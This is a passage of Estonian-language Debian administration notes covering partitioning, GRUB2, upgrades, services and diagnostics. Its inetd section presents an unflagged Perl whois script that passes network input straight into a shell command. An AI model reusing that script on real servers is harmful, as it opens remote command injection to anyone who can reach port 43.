$ cal > /tmp/fifonimi

siis tulemusena esitatakse esimeses aknas cal käsu väljund.

Osutub, et pipe ei ole alati vajalik moodustada mkfifo käsu abil, sobib ka nii, sellisel juhul on tegu anonüümse pipe'iga

$ cal | cat

===Pidgin===

Pidgin (nö vana nimega Gaim) http://www.pidgin.im/ on mitmeid protokolle toetav instant messaging tarkvara. Kuna Debiani paketihalduse Pidgin tõrgub vahel, siis üks otsekohene alternatiiv on kasutada lähtetekstist kompileeritud Pidgini

# apt-get build-dep pidgin
$ ./configure --prefix=/opt/pidgin --disable-vv --disable-idn
$ make
$ make install

Pidgin v. 2.10.0, tundub, et kui kasutada süsteemis mozilla.debian.net tarkvara, siis ebaõnnestub sõltuvuste tõttu

# apt-get build-dep pidgin

Sellisel juhul tuleb käsitsi paigaldada

# apt-get install intltool libglib2.0-dev libgtk2.0-dev

$ ./configure --prefix=/opt/pidgin --disable-vv --disable-idn --disable-nm --disable-screensaver \
--disable-gtkspell --disable-gstreamer --disable-meanwhile --disable-avahi --disable-dbus --disable-tk
...

===lm-sensors===

lm-sensors http://www.lm-sensors.org/ tarkvara paigaldamiseks sobib öelda

# apt-get install lm-sensors

Esmalt tuleb teha kindlaks olemasolev riistvara ning laadida vastavad moodulid

# sensors-detect

Kasutamiseks öelda nt

# sensors -A | grep Core
Core 0: +47.0 C (high = +76.0 C, crit = +100.0 C)
Core 1: +51.0 C (high = +76.0 C, crit = +100.0 C)
Core 2: +41.0 C (high = +76.0 C, crit = +100.0 C)
Core 3: +41.0 C (high = +76.0 C, crit = +100.0 C)

kus

* Core N - protsessori tuuma temperatuur

===GPT kasutamine===

GPT (GUID Partition Table) http://en.wikipedia.org/wiki/GUID_Partition_Table on seotud järgmiste probleemide lahendamisega

* operatsioonisüsteemis soovitakse kasutada suuremat partitsiooni kui 2TB
* arvuti riistvara ei kasuta nn PC-BIOS'i vaid nt UEFI't (Unified Extensible Firmware Interface)
* kasutatakse 4096 B plokisuurusega kõvaketast
* saab kasutada kuni 128 nn primary partitsiooni

====GPT partitsioonide haldamine====

GPT partitsioonide haldamiseks sobib 2010 aasta suvel kasutada nt programme parted ja gdisk, esmalt tuleb moodustada plokkseadmele label öeldes

# parted /dev/sdc
(parted) mklabel gpt
Warning: The existing disk label on /dev/sdc will be destroyed and all data on this disk will be lost. Do you want to continue?
Yes/No? Yes

TODO

Kui kasutada fdisk programmi GPT partitsioonitabelit kasutava plokkseadmega, siis paistab tulemus selline

# fdisk -uc /dev/sda -l
WARNING: GPT (GUID Partition Table) detected on '/dev/sda'! The util fdisk doesn't support GPT. Use GNU Parted.
...
Device Boot Start End Blocks Id System
/dev/sda1 1 10485759 5242879+ ee GPT

====GRUB2 alglaaduri kasutamine GPT ja PC-BIOS riistvaraga====

Kui UEFI riistavara töötab GRUB2 alglaaduri ja GPT partitsioneeritud kõvakettaga nö otseselt, siis PC-BIOS arvuti puhul tuleb kasutada seejuures mõnda täiendavat võtet. Üldiselt toimub PC-BIOS riistvaral töötava süsteemi alglaadimine selliselt

* kõvakettale on moodustatud kolm GPT partitsiooni

(parted) p

Number Start End Size File system Name Flags
1 2048s 4095s 2048s biosboot bios_grub
2 4096s 1052671s 1048576s boot
3 1052672s 3905974271s 3904921600s system

* alglaadimisel loetakse üks alglaaduri aste esimeselt partitsioonilt
* järgmised astmed ning operatsioonisüsteemi tuum ja initramfs loetakse boot partitsioonilt
* operatsioonisüsteemi juurfailisüsteem asub kolmandal partitsioonil või sellel paiknevalt loogiliselt seadmelt, nt LVM köitelt

=====GPT partitsioonide moodustamine=====

(parted) unit s
(parted) mkpart biosboot 2048 4095
(parted) set 1 bios_grub on
(parted) mkpart boot 4096 1052671
(parted) mkpart system 1052672 3907026943
(parted) set 3 lvm on

kus

* tuleb jälgida, et partitsioonide suurused saavad sobivad, kaks esimest võiksid olla suhtliselt universaalselt sobivad

=====Failisüsteemide ettevalmistamine=====

GPT pealt töötava süsteemi saab ettevalmistada nt ühendades vastav plokkseade külge mõnele olemasolevale töötavale süsteemile. Seejärel moodustada seadmele GPT partitsioonitabel, failisüsteemid ning kopeerida sinna töötav süsteem üle, nt rsync abil.

=====GRUB2 seadistamine ja paigaldamine=====

GRUB2 seadistamiseks sobib kasutada nt sellist /etc/grub.d/40_custom faili

#!/bin/sh
exec tail -n +3 $0
# This file provides an easy way to add custom menu entries. Simply type the
# menu entries you want to add after this comment. Be careful not to change
# the 'exec tail' line above.

echo "Debian GPT" >&2
menuentry "Debian GPT" {
insmod part_gpt
insmod ext2
set root=(hd0,gpt2)
linux /vmlinuz-2.6.32-2-amd64 root=/dev/mapper/system-root ro
initrd /initrd.img-2.6.26-2-amd64
}

kus

* insmod part_gpt - grub2 laadib omale GTP partitsioonitabeli tundmise tarkuse
* (hd0,gpt2) - näitab millisel GPT partitsioonil asub /boot failisüsteem

Eeldusel, et failisüsteemid on monteeritud öelda

# grub-install --recheck --no-floppy --root-directory=/mnt/root /dev/sda
Installation finished. No error reported.

Tulemusena peaks arvuti käivituma.

====4096 B plokisuurusega kõvaketaste kasutamine====

2010 aasta suvel on 4k plokisuurusega kõvaketaste kasutamine pisut ebaselge, tundub, et üldiselt peaks utiliidid sellega automaatselt hiljem või varem hakkama saama. Hetkel näib ohutu nö käsitsi arvestada, et partitsiooni algus satuksid arvudega 8 ja 512 jaguvatele kohtadele, nt kasutades GPT partitsioonitabelit selliselt

(parted) unit s
(parted) mkpart system 2048 327679999
(parted) mkpart pgdata 327680000 164863999

kus

* unit s - edasi esitatakse partitsiooni algus ja lõpp sektori numbrina
* system - partitsiooni nimi kasutajale tähendust omaval kujul
* 2048 - partitsiooni algussektor
* 327679999 - partitsiooni lõpp sektor, arvestusega, et 327679999 + 1 jagub arvudega 8 ja 512

Paritsioonitüüpide näitamiseks öelda

(parted) set 1 lvm on
(parted) set 2 lvm on

Tulemuseks on

(parted) p
Model: ATA WDC WD2003FYYS-0 (scsi)
Disk /dev/sdc: 3907029168s
Sector size (logical/physical): 512B/512B
Partition Table: gpt

Number Start End Size File system Name Flags
1 2048s 327679999s 327677952s system lvm
2 327680000s 328703999s 1024000s pgdata lvm

Kui selliselt ettevalmistatud plokkseadmel kasutada failisüsteemi või nt mdadm, lvm või cryptsetup lahendusi, siis väidetavalt neile sobib 4k plokisuuris hästi.

====Kasulikud lisamaterjalid====

* http://www.ibm.com/developerworks/linux/library/l-4kb-sector-disks/
* http://www.johannes-bauer.com/linux/wdc/?menuid=3
* http://grub.enbug.org/BIOS_Boot_Partition
* http://wiki.archlinux.org/index.php/User:Skodabenz/GPT
* http://jamie.mayfirst.org/posts/2010/two-tb-disks/
* http://www.wensley.org.uk/gpt

===atftpd kasutamine===

atftpd on tftpd server ning atftp vastav klient.

====Server====

Serveri paigaldamiseks sobib öelda

# apt-get install atftpd

Seejuures küsitakse hulk küsimusi, vaikimisi käivitatakse paigaldamise lõpuks tftp teenus inetd superserverist ning kataloogiks on /srv/tftp.

Tööd juhitakse

* /etc/default/atftpd failis

USE_INETD=true

* /etc/inetd.conf failis sarnase reaga

tftp dgram udp4 wait nobody /usr/sbin/tcpd /usr/sbin/in.tftpd --tftpd-timeout 300 \
--retry-timeout 5 --no-multicast --maxthread 100 --verbose=5 --logfile /var/log/atftpd.log /srv/tftp

====Klient====

Kliendi paigaldamiseks sobib öelda

# apt-get install atftp

Kasutamiseks öelda nt

$ atftp 192.168.10.10
tftp> get /srv/tftp/sg200-18-20131217-mirror.conf

Tulemusena kopeeritakse fail kliendi käesolevasse kataloogi.

===strace programmi kasutamine===

Nö failisüsteemi tcpdump kasutamiseks sobib esmalt vaadata nt veebiseveri protsesside numbrid ja seejärel öelda

$ strace -p 19282 -p 19283 -p 19284 -p 19285 -p 19286 -p 19368 -p 20015 -p 29774 -p 29775 -f -e trace=open

kus

* -f - järgib forkisid
* -e määratleb, et jälgitakse failiavamisi

Märkused

* kui kasutada mitu korda -e parameetrit, siis kehtestub ainult viimane kasutamine
* kui kasutada -e järel mitut väärtust, nt '-e trace=read,write', siis väärtused OR-itakse kokku
* kui on soov jälgida konkreetse file descriptori kasutusi, siis tuleb strace väljundi teksti töödelda grep vms üldiste vahenditega
* shelli protsessi on huvitav strace'ida teisest aknast

Kasulikud lisamaterjalid

* http://myhowto.org/solving-problems/7-exploring-system-internals-with-lsof-and-strace/
* http://www.noah.org/wiki/Debugging_notes

===Debian Squeeze paigaldamine USB pulgalt===

Debian Squeeze operatsiooniüsteemi USB pulgalt paigaldamise eeldusteks on

* kasutada on olemasolev võrguühendusega Linux arvuti
* installeeritav arvuti boodib USB pulgalt
* installeeritava arvuti saab ühendada võrku

USB pulk tuleb Debian Squeeze paigaldamiseks ettevalmistada järgmiselt

* vastaku USB pulgale seade /dev/sdf, pulk peab olema monteerimata olekus, st öelda

# umount /dev/sdf

* lähtudes aadressilt http://www.debian.org/devel/debian-installer/ kopeerida sobivad boot.img.gz ning netinst.iso failid, nt

# http://ftp.nl.debian.org/debian/dists/testing/main/installer-amd64/current/images/hd-media/boot.img.gz
# http://cdimage.debian.org/cdimage/squeeze_di_rc1/amd64/iso-cd/debian-sq-di-rc1-amd64-netinst.iso

* kopeerida boot.img.gz pulgale öeldes

# zcat boot.img.gz > /dev/sdf

* monteerida pulk ning kopeerida netinst iso

# mkdir /mnt/sdf
# mount /dev/sdf /mnt/sdf
# cp debian-sq-di-rc1-amd64-netinst.iso /mnt/sdf

* ainult nn kommertsdraiveritega töötava riistvara kasutamiseks on vajalik lisaks kopeerida arhiiv firmware.tar.gz aadressilt http://cdimage.debian.org/cdimage/unofficial/non-free/firmware/, nt

# wget http://cdimage.debian.org/cdimage/unofficial/non-free/firmware/squeeze/current/firmware.tar.gz

ning pakkida lahti pulga juurikale kataloogi firmware

# mkdir /mnt/sdf/firmware
# tar -C /mnt/sdf/firmware -z -x -f firmware.tar.gz

Lõpuks tuleb pult lahti monteerida

# umount /mnt/sdf

Pulga kasutamiseks tuleb pult ühendada kõnealuse arvutiga, BIOS'ist seadistada käivituma USB pulgalt ning algab tarkvara paigaldus. Paigalduse käigus peaks olema kasutada internetiühendus.

===SSL juur-sertifikaatide lisamine===

Selleks, et süsteemi utiliidid, nt wget tunnustaksid veebiserveri sertifikaati peab olema vastav juur-sertifikaat ära kirjeldatud. Juur-sertifikaadi lisamiseks tuleb

* paigaldada pakett ca-certificates

# apt-get install ca-certificates

* kopeerida uus juur-sertifikaat kataloogi /usr/local/share/ca-certificates (failinimi peab lõppema .crt vastasel korral update-ca-certificates skript seda ei käsitle)

# cp Juur-LOOMAAED-cacert.pem /usr/local/share/ca-certificates/Juur-LOOMAAED.crt

* öelda

# update-ca-certificates

Tulemusena genereeritakse uued c_rehashid kataloogi /etc/ssl/certs

# ls -l /etc/ssl/certs/ | grep Juur
lrwxrwxrwx 1 root root 44 Feb 3 14:18 Juur-LOOMAAED.pem -> /usr/local/share/ca-certificates/Juur-LOOMAAED.crt
lrwxrwxrwx 1 root root 11 Feb 3 14:18 a376ee62.0 -> Juur-LOOMAAED.pem

ning lisatakse ta suurfaili /etc/ssl/certs/ca-certificates.crt.

===Debian v. 4 Etch -> v. 5 Lenny uuendamine===

Kui sources.list failis lenny kasutamise järel apt-get update ütleb vea

W: There is no public key available for the following key IDs:
4D270D06F42584E6
W: You may want to run apt-get update to correct these problems

siis aitab paigaldada debian-archive-keyring pakett

# apt-get install debian-archive-keyring

Kui kasutusel on uuemad bnx2 draiveriga käivad võrgukaardid, siis tuleb jälgida, et oleks paigaldatud pakett firmware-bnx2

# apt-get install firmware-bnx2

===Debian v. 5 Lenny -> v. 6 Squeeze uuendamine===

Ametlik operatsioonisüsteem Debian GNU/Linux Lenny -> Squeeze (v. 5.0 -> v. 6.0) juhend asub aadresil http://www.debian.org/releases/squeeze/amd64/release-notes/ch-upgrading.en.html

Uuendamise on oluline tähele panna järgmisi asjaolusid

* asutakse kasutama dash shelli nö süsteemse shellina, mh tähendab see, et /bin/sh -> bash asemel on

$ ls -l /bin/sh
lrwxrwxrwx 1 root root 4 Dec 26 2010 /bin/sh -> dash

* asuda uuendama süsteemi, millele on kõik Lenny uuendused rakendatud
* asendatakse legacy GRUB GRUB2 alglaaduriga, vajadusel anda pärast uuendust töötavas Squeeze süsteemis käsk upgrade-from-grub-legacy
* veenduda enne uuendamise protseduuri, et failisüsteemis on piisavalt vaba ruumi
* asutakse bootloaderis kasutama failisüsteemide plokkseadmetele vastavaid UUID väärtusi
* eemdalda paketihaldusest mitte paigaldatud tarkvara (nt VMWare Tools)
* eemaldada /etc/ alt nö käsitsi lisatud start-up skriptid, mis võivad segada automaatset süsteemi migreerimist kasutama insserv käivitusskripte

====Uuendamise protseduur====

* veenduda, et on olemas süsteemist varukoopia
* rakendada paketihaldusest uuendused vanale süsteemile
* teha seadistusfailidest koopia, et oleks mugav võrrelda

# cp -a /etc /root/etc-20110522-tootanud-lenny
# cp -a /boot /root/boot-20110522-tootanud-lenny

* eemaldada paketihaldusest mitte paigaldatud tarkvara, nt

# vmware-uninstall.pl

* kasutada /etc/apt/sources.list faili sisuga, uuendamise ajal on security välja kommenteeritud

deb http://ftp.ee.debian.org/debian/ squeeze main contrib non-free
deb-src http://ftp.ee.debian.org/debian/ squeeze main contrib non-free

# deb http://security.debian.org/ squeeze/updates main contrib non-free
# deb-src http://security.debian.org/ squeeze/updates main contrib non-free

ning öelda

# apt-get update
# apt-get dist-upgrade -d

* kasutada script'i esitatud küsimuste-vastuste-teadete salvestamiseks, mis töötab üldiselt nii

# script -t 2>~/kernel-udev-upgrade-squeezestep.time -a ~/kernel-udev-upgrade-squeezestep.script
Script started, file is /root/upgrade-squeezestep.script
# date
...
# Ctrl-D
Script done, file is /root/upgrade-squeezestep.script

script tööga kaasneb kaks protsessi

# ps aux | grep scr
root 4960 0.0 0.0 5848 572 pts/0 S+ 10:36 0:00 script -t -a /root/upgrade-squeezestep.script
root 4961 0.0 0.0 5852 460 pts/0 S+ 10:36 0:00 script -t -a /root/upgrade-squeezestep.script

* käivitada script abil salvestamine

# script -t 2>~/kernel-udev-upgrade-squeezestep.time -a ~/kernel-udev-upgrade-squeezestep.script

* uuendada tuum ja udev

# apt-get install linux-image-2.6-amd64

Seejuures pakutakse ja võiks aktsepteerida plokkseadmete UUID väärtuste kasutamist.

# apt-get install udev

* vajadusel paigaldada non-free firmware draiverid öeldes (nt bnx 10g seadme jaoks)

# apt-get install firmware-linux-nonfree

* veenduda, et /boot/grub/menu.lst algaadib uue tuumaga, /etc/fstab ühendab külge sobivad failisüsteemid ja alglaadida süsteem
* veenduda, et failisüsteemis on piisavalt ruumi, käivitada script ja paigaldada muud süsteemi uuendused

# script -t 2>~/dist-upgrade-squeezestep.time -a ~/dist-upgrade-squeezestep.script
# apt-get dist-upgrade

* dash shelli kasutamiseks öeldakse

The system shell is the default command interpreter for shell scripts.

Using dash as the system shell will improve the system's overall performance. It does not alter the shell
presented to interactive users. Use dash as the default system shell (/bin/sh)?

* dist-upgrade käigus üritatakse migreerida dependecy-based insserv käivitusskriptidele

The boot system is prepared to migrate to dependency-based sequencing. This is an irreversible step, but one that is recommended:
it allows the boot process to be optimized for speed and efficiency, and provides a more resilient framework for development.

A full rationale is detailed in /usr/share/doc/sysv-rc/README.Debian. If you choose not to migrate now, you can do so later by
running "dpkg-reconfigure sysv-rc".

Migrate legacy boot sequencing to dependency-based sequencing?

* Uuendamisel tuleb kasutaja poolt muudetud seadistusfailid lasta uute nn package maintainer versiooniga üle kirjutada ja pärast muudatused käsitsi kohendada, nimekirja muudetud failidest näeb nt nii

# grep "Configuration file" dist-upgrade-squeezestep.script
Configuration file `/etc/security/limits.conf'
Configuration file `/etc/nagios/nrpe.cfg'
Configuration file `/etc/sysctl.conf'
Configuration file `/etc/rsyslog.conf'
Configuration file `/etc/ssh/ssh_config'
Configuration file `/etc/apache2/apache2.conf'
Configuration file `/etc/apache2/ports.conf'
Configuration file `/etc/joe/joerc'
Configuration file `/etc/snmp/snmpd.conf'
Configuration file `/etc/default/snmpd'

kusjuures asendatud failst salvestatakse reeglina koopia nimele lisades lõppu .dpkg-old, nt

/etc/snmp/snmpd.conf.dpkg-old

st ülekirjutatud failid leiab nt nii

# find /etc/ -name \*-old

* vmware tools kompileerimise asemel on alternatiiv kasutada paketti open-vm-tools, kasutaja peab ise otsustama mida eelistada

# apt-get install open-vm-tools
...
Loading open-vm-tools modules: vmhgfsFATAL: Module vmhgfs not found.
vmmemctlFATAL: Module vmmemctl not found.
vmsyncFATAL: Module vmsync not found.

* vajadusel öelda

# dpkg-reconfigure sysv-rc

* vajadusel öelda (kui uuendatavas süsteemis mingil põhjusel oli alglaadur paigaldamata paketihaldusest)

# apt-get install grub-pc

* vajadusel öelda

# upgrade-from-grub-legacy

* kasutuses mitte olevate pakettide eemaldamine

# apt-get autoremove

* eemaldada /etc/apt/sources.list failid security eest kommentaarid ja rakendada uuendused
* kohendada käsitsi paketihaldusest uuendamise käigus vaikeväärtustega asendatud seadistusfailid

====Märkused====

* kui uuendamine peatub seetõttu, et mõne nö ebaolulise programmi käivitusskript ei tööta, siis sobib vastav pakett eemaldada, kui ka see ei õnnestu, siis võiks proovida käivitusskripti sisu asendada millegagi, mis formaalselt toimib, nt

# cat /etc/init.d/nagios3
#! /bin/sh
exit 0;

===Debian v. 6 Squeeze > v. 7 Wheezy uuendamine===

Ametlik operatsioonisüsteem Debian GNU/Linux Lenny -> Squeeze (v. 6.0 -> v. 7.0) juhend asub aadresil http://www.debian.org/releases/stable/amd64/release-notes/ch-upgrading.en.html

Debian v. 7 Wheezy GRUB2 versiooni on number selline

GNU GRUB version 1.99-27+deb7u1

Kui 2015 kevadel öelda

# apt-get update
Hit http://ftp.ee.debian.org wheezy Release.gpg
...
Reading package lists... Done
W: There is no public key available for the following key IDs:
7638D0442B90D010

siis aitab

# apt-get install debian-keyring debian-archive-keyring

===Debian v. 8 Jessie -> v. 9 Stretch uuendamine===

Operatsioonisüsteemi uuendus toimub nagu tavaliselt, kuid viimaks sobib öelda

# aptitude search ?obsolete
# aptitude purge ?obsolete

MySQL -> MariaDB uuendus toimub üldiselt automaatselt, aga sobib lõpus öelda (vt ligipääs failist /etc/mysql/debian.cnf)

# mysql_upgrade -h localhost -u debian-sys-maint -pparool

Kasulikud lisamaterjalid

* https://www.debian.org/releases/stretch/amd64/release-notes/ch-upgrading.en.html
* https://www.auul.pri.ee/wiki/MySQL_andmebaasi_kasutamine_operatsioonis%C3%BCsteemiga_Debian#Andmebaasi_uuendamine_MySQL_v._5.5_-.3E_MariaDB_v._10.1

===insserv käivitussüsteemi kasutamine===

Debian Squeeze v. 6.0 kasutab nn System-V-like käivitusskripte, kusjuures nende tööd saab seadistada insserv tarkvaraga

# cat /etc/init.d/nfsen
#!/bin/sh
set -e

### BEGIN INIT INFO
# Provides: nfsen
# Required-Start: $local_fs $remote_fs $network $time
# Required-Stop: $local_fs $remote_fs $network $time
# Should-Start: $syslog
# Should-Stop: $syslog
# Default-Start: 2 3 4 5
# Default-Stop: 0 1 6
# Short-Description: NfSen Server
### END INIT INFO

#!/bin/bash
case "$1" in
start)
echo "Starting NfSen server"
/srv/nfsen/bin/nfsen start
;;
stop)
echo "Stopping NfSen server"
/srv/nfsen/bin/nfsen stop
;;
*)
echo "Usage: /etc/init.d/nfsen {start|stop}"
exit 1
esac
exit 0

/etc/rc3.d jt rc kataloogide alla tekivad lingid öeldes

# insserv nfsen

Käivitusskriptile linkide eemaldamiseks sobib öelda

# insserv -r nfsen

Lisaks -n võtme lisamine ainult näitab, mis toimuks

# insserv -n -d nfsen

Required-Start: rea lõppu lisades nt 'postgresql' tulemusena käivitatakse kõnealune programm peale PostgreSQL andmebaasi.

Lisamaterjalid:

* http://wiki.debian.org/LSBInitScripts
* http://wiki.debian.org/LSBInitScripts/DependencyBasedBoot

===Dhcpd serveri kasutamine===

ISC DHCP tarkvara paigaldamiseks sobib öelda

# apt-get install dhcp3-server

DHCP serveri tööd juhib seadistusfail, nt

# cat /etc/dhcp/dhcpd.conf
ddns-update-style none;
default-lease-time 600;
max-lease-time 7200;
log-facility local7;

shared-network auul {
option domain-name "auul";
option domain-name-servers 10.192.0.53;

subnet 192.168.50.0 netmask 255.255.255.0 {
range 192.168.50.200 192.168.50.224;
option routers 192.168.50.10;
}
}

Lisaks näidatakse failis /etc/default/isc-dhcp-server millistel võrguseadmetel teenust pakutakse

# cat /etc/default/isc-dhcp-server
...
INTERFACES="eth1"

DHCP serveri käivitab skript

# /etc/init.d/isc-dhcp-server stop|start

===At tööd===

Töö tekitamiseks sobib öelda

$ echo "date >> /tmp/test.log" | at -t 201509250950

Tööde nimekirja esitamiseks

$ atq
10 Fri Sep 25 09:50:00 2015 a imre

Tehtud tööd eemaldatakse automaatselt, tuleviku tööde eemaldamiseks

$ atrm 10

Töö sisu esitamiseks

$ at -c 10

===Cron tööd===

Debiani cron töid juhivad sellised seadistusfailid

* /etc/crontab
* /etc/cron.d - kataloogis sisalduvaid faile käsitletakse cron kirjeldusfailidena, /etc/crontab formaadis (st sisaldub user väli)
* /etc/cron.daily
* /etc/cron.hourly
* /etc/cron.monthly
* /etc/cron.weekly
* /var/spool/cron/kasutajanimi

Kasulikud lisamaterjalid

* man cron

===Anacron===

Anacron http://anacron.sourceforge.net/ ...

===tcp wrapper teegi kasutamine===

Paljud Debiani programmid on kompileeritud vastu libwrap teeki, mis tähendab, et nende tööd saab kontrollida /etc/hosts.allow ja /etc/hosts.deny failidest. Nt nrpe deemoni puhul selleks, et lubada ligipääsu võrgust 172.18.20.0/24 sobib kasutada

# cat /etc/hosts.allow
nrpe: 172.18.20.0/24

# cat /etc/hosts.deny
nrpe: ALL

Seadistustes tehtud muudatused kehtestuvad kohe, midagi ei ole vaja reloadida ega restartida. Seda kas programm on kompileeritud vastu librwap teeki saab küsida

# ldd /usr/sbin/nrpe | grep libwrap
libwrap.so.0 => /lib/libwrap.so.0 (0x00007fd00518b000)

===dump ja restore kasutamine===

Dump faili moodustamiseks

# umount /mnt/lvmkoitenimi
# dump -0uf /tmp/failinimi.dump /dev/system/lvmkoitenimi
DUMP: Date of this level 0 dump: Tue Jul 12 23:45:46 2011
DUMP: Dumping /dev/system/lvmkoitenimi (an unlisted file system) to /tmp/failinimi.dump
DUMP: Label: none
DUMP: Writing 10 Kilobyte records
DUMP: mapping (Pass I) [regular files]
DUMP: mapping (Pass II) [directories]
DUMP: estimated 66671 blocks.
DUMP: Volume 1 started with block 1 at: Tue Jul 12 23:45:47 2011
DUMP: dumping (Pass III) [directories]
DUMP: dumping (Pass IV) [regular files]
DUMP: Closing /tmp/failinimi.dump
DUMP: Volume 1 completed at: Tue Jul 12 23:45:48 2011
DUMP: Volume 1 66500 blocks (64.94MB)
DUMP: Volume 1 took 0:00:01
DUMP: Volume 1 transfer rate: 66500 kB/s
DUMP: 66500 blocks (64.94MB) on 1 volume(s)
DUMP: finished in 1 seconds, throughput 66500 kBytes/sec
DUMP: Date of this level 0 dump: Tue Jul 12 23:45:46 2011
DUMP: Date this dump completed: Tue Jul 12 23:45:48 2011
DUMP: Average transfer rate: 66500 kB/s
DUMP: DUMP IS DONE

kus

* -0 - tekitada full dump
* -u - kirjutada tegevuse kohta jälg /var/lib/dumpdates faili
* -f - salvestada dump näidatud faili

Dump failist taastamiseks

# mount /dev/system/lvmkoitenimi_2 /mnt/lvmkoitenimi_2
# cd /mnt/lvmkoitenimi_2
# restore -rf /tmp/failinimi.dump

kus

* -r - taastada dumpis käesolevasse kataloogi, mis on kuhu on monteeritud tühi failisüsteem
* -f - kasutatav dump fail

===inetd===

Debian Squeeze paketihaldusest saab valida erinevaid inetd servereid, openbsd-inetd paigaldamiseks sobib öelda

# apt-get install openbsd-inetd

2011. aasta keskel v. 1.3.5 sisaldab libexec/Lookup.pm teeki, kuhu on sisse kirjutatud whois.cyberabuse.org serveri nimi, kuid see server ei paku enam sobival viisil teenust ning tulemuseks on, et NfSen liideses ei saa enam ip aadressidel teha päringuid. Üheks alternatiiviks on seadistada käima lokaalne whois teenus, nt ühendades 43/tcp port ja sellise Perli skripti sisend ja väljund kokku inetd abil

# cat /srv/data/nfsen/libexec/whois.pl
#!/usr/bin/perl
my $filename = <>;

foreach $rida($filename) {
$vastus=`/usr/bin/whois $rida`;
print $vastus;
last;
};

ning kasutades /etc/inetd.conf seadisusfailis rida

43 stream tcp nowait nobody /srv/data/nfsen/libexec/whois.pl whois.pl

whois päringute esitamise kontrollimiseks sobib öelda

$ whois -h 127.0.0.1 127.0.0.1
..
NetRange: 127.0.0.0 - 127.255.255.255
CIDR: 127.0.0.0/8
OriginAS:
NetName: SPECIAL-IPV4-LOOPBACK-IANA-RESERVED
NetHandle: NET-127-0-0-0-1
Parent:
NetType: IANA Special Use

Kasutaja peab ise otsustama, kas talle selline lahendus sobib.

Kasulikud lisamaterjalid

http://www.telecom.otago.ac.nz/tele301/student_html/inetd-tcpwrappers.html

===RPC portmapper===

Debain Squeeze paketihaldusest saab valida erinevaid RPC portmap lahendusi, portmap paigaldamiseks sobib öelda

# apt-get install portmap

Arvutis töötavate RPC teenuste nimekirja küsimiseks sobib öelda

# rpcinfo -p hostname

Tundub, et rpcbind toetab erinevalt portmap tarkvarast IPv6 protokolli.

===Netlink socket===

ip programm suhtleb tuumaga kasutades netlink socket'it, mis praktiliselt tähendab nt seda, et ip programmi saab kasutada chroot keskkonnast, kus pole /proc failisüsteemi külge monteeritud (erinevalt ifconfig programmist, mis kasutab /proc failisüsteemi).

Kasulikud lisamaterjalid

* http://en.wikipedia.org/wiki/Netlink
* http://www.linuxjournal.com/article/7356?page=0,0

===Process accounting===

Operatsioonisüsteemi Debian Squeeze vaikimisi tuum võimaldab koguda process accountiga andmeid. Seda sobib teha nt acct paketi tarkvara abil, paigaldamiseks sobib öelda

# apt-get install acct

Tulemusena paigaldatakse muu hulgas sellised failid

* /usr/bin/lastcomm
* /usr/bin/ac
* /usr/sbin/accton
* /usr/sbin/sa
* /usr/sbin/dump-utmp
* /usr/sbin/dump-acct
* /etc/cron.daily/acct
* /etc/init.d/acct
* /etc/default/acct
* /etc/cron.monthly/acct

Selleks, et arvutis töötavate protsesside kohta andmed kogunema hakkaksid, vaikimisi faili /var/log/account/pacct, tuleb öelda

# accton on | off

Kogutud andmete esitamine toimub selliselt

# dump-acct /var/log/account/pacct | tail -n 5
tail |v3| 0.00| 0.00| 0.00| 0| 0| 4088.00| 0.00| 19856 19253|Mon Sep 19 20:34:56 2011
cron |v3| 0.00| 0.00| 1.00| 0| 0| 18832.00| 0.00| 19857 1138|Mon Sep 19 20:35:01 2011
ssh |v3| 0.00| 1.00| 75.00| 0| 0| 43192.00| 0.00| 19860 19633|Mon Sep 19 20:35:06 2011
postgres |v3| 0.00| 0.00| 2.00| 109| 113| 94272.00| 0.00| 19863 1395|Mon Sep 19 20:35:09 2011
telnet |v3| 0.00| 0.00| 3.00| 1000| 1000| 22680.00| 0.00| 19870 19865|Mon Sep 19 20:35:19 2011

kus kuuendas tulbas on protsessi UID väärtus.

===Passwords and encryption keys (Seahorse)===

TODO

===Mälu kasutamine===

Arvuti mälu kasutamise kohta saab küsida selliselt

# free
total used free shared buffers cached
Mem: 509172 501192 7980 0 3784 200248
-/+ buffers/cache: 297160 212012
Swap: 1048568 92568 956000

kus

* total (509172) - kogu RAM (miinus natuke kerneli tarvis)
* used (501192) - kokku kasutusel
* free (7980) - kokku vaba
* buffers (3784) - kasutusel mälust on nii palju kasutusel buffers all
* cached (200248) - kasutusel mälust on nii palju kasutusel failisüsteemi cache'ina
* teisel real on toodud arvutatud used ja free, mis vastavad sellele, kui buffers + cached oleks vastavalt maha lahutatud või juurde liidetud; selline vaade on õigustatud, kuna Linux tuum vajadusel kasutab failisüsteemi cache'iks olevat mälu ressurssi muuks tarbeks

297160 = 501192 - 3784 - 200248
212012 = 7980 + 3784 + 200248

st kasutatud mälu on tegelikult vähem kui näib ja vaba mälu on vastavalt samapalju rohkem kui näib.

====Jõudlus====

Arvuteid on valmistatud kasutes erinevaid tehnoloogiaid ja lisaks muudele erinevustele erinevad nad ka mälu kasutamise kiiruse poolest. Üks võimalus mälu kasutamise jõudlust hinnata nö sünteetilise testiga (st spetsiaalselt selleks tarbeks valmistatud programmo abil), nt

* http://www.cs.virginia.edu/stream/
* https://github.com/gregs1104/stream-scaling

Kasutamiseks tuleb viimaselt lingilt kopeerida tar.gz fail, pakkida arhiiv lahti ning öelda

$ ./stream-scaling

Tulemusena kompileeritakse programm, seejärel käivitatakse ning väljastatakse tulemus, nt

$ ./stream-scaling
=== CPU cache information ===
CPU /sys/devices/system/cpu/cpu0 Level 1 Cache: 32K (Data)
CPU /sys/devices/system/cpu/cpu0 Level 1 Cache: 32K (Instruction)
CPU /sys/devices/system/cpu/cpu0 Level 2 Cache: 6144K (Unified)
...
Total CPU system cache: 25296896 bytes
Suggested minimum array elements needed: 11498589
Array elements used: 11498589

=== CPU Core Summary ===
processor : 3
model name : Intel(R) Core(TM)2 Quad CPU Q9550 @ 2.83GHz
cpu MHz : 1998.000
siblings : 4

=== Testing up to 4 cores ===
...
-------------------------------------------------------------
Function Rate (MB/s) Avg time Min time Max time
Copy: 4101.0477 0.0453 0.0449 0.0456
Scale: 4121.7264 0.0451 0.0446 0.0458
Add: 4982.5056 0.0557 0.0554 0.0560
Triad: 5001.9268 0.0556 0.0552 0.0561
-------------------------------------------------------------
Solution Validates
-------------------------------------------------------------

Number of Threads requested = 2
Function Rate (MB/s) Avg time Min time Max time
Triad: 5002.6618 0.0566 0.0552 0.0610

Number of Threads requested = 3
Function Rate (MB/s) Avg time Min time Max time
Triad: 4892.7425 0.0577 0.0564 0.0607

Number of Threads requested = 4
